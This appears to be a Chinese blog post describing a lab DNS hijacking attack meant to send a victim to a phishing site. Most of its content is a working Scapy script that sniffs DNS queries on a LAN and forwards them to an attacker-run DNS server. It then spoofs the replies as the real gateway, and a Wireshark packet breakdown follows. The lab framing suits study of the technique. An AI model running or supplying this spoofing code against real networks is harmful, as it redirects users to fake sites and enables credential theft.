DNS劫持实验(钓鱼网站)

实验环境:

搭建一个目标网站www.wh.com

网卡:192.168.146.2

Win7 (被欺骗的)IP:192.168.146.129

Win2008 (假DNS服务器)   IP:192.168.146.130

1、网站搭建

Win2008网卡

 

2、执行py代码

from scapy.all import *

wlan2="VMware Virtual Ethernet Adapter for VMnet8"
dns_server="192.168.146.130"  # win2008已搭好的dns服务器
dnsdst=""
def rev(p):
	global dnsdst
	try:
		pip=p[IP]
		pudp=[UDP]
		pdns=p[DNS]
		if p.dport==53 and pip.dst=="192.168.146.2":# 这个包是win7向网关的请求包 
			dnsdst=pip.src  
			send(IP(src="192.168.146.1",dst=dns_server,ttl=55)/UDP(sport=p[UDP].sport,dport=53)/pdns,iface=wlan2)
			print("转发查询信息成功",dnsdst)
		elif p.sport==53 and pip.src==dns_server:  #这一个包是搭建的DNS给自己回的包
			#print(dnsdst)
			send(IP(src="192.168.146.2",dst="192.168.146.129",ttl=55)/UDP(sport=53,dport=p[UDP].dport)/pdns,iface=wlan2)
			print("转发响应信息成功")
	except :
		pass
print("开始攻击")
sniff(iface=wlan2,filter="udp  port 53",timeout=300,prn=rev)

 

成功劫持

注:

我们用wireshark抓包分析 (vmware8网卡)

1(请求包): win7向真实网关发送解析域名请求

2(请求包): 我们模拟客户端向win2008发送请求包

3(响应包): win2008将搭建的网站IP返回给我们

4(响应包): 我们伪装成真实网关192.168.146.2向win7回应 给它假的IP

5(响应包): 真实网关向win7返回查到的真实IP

 

 

  • 4
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值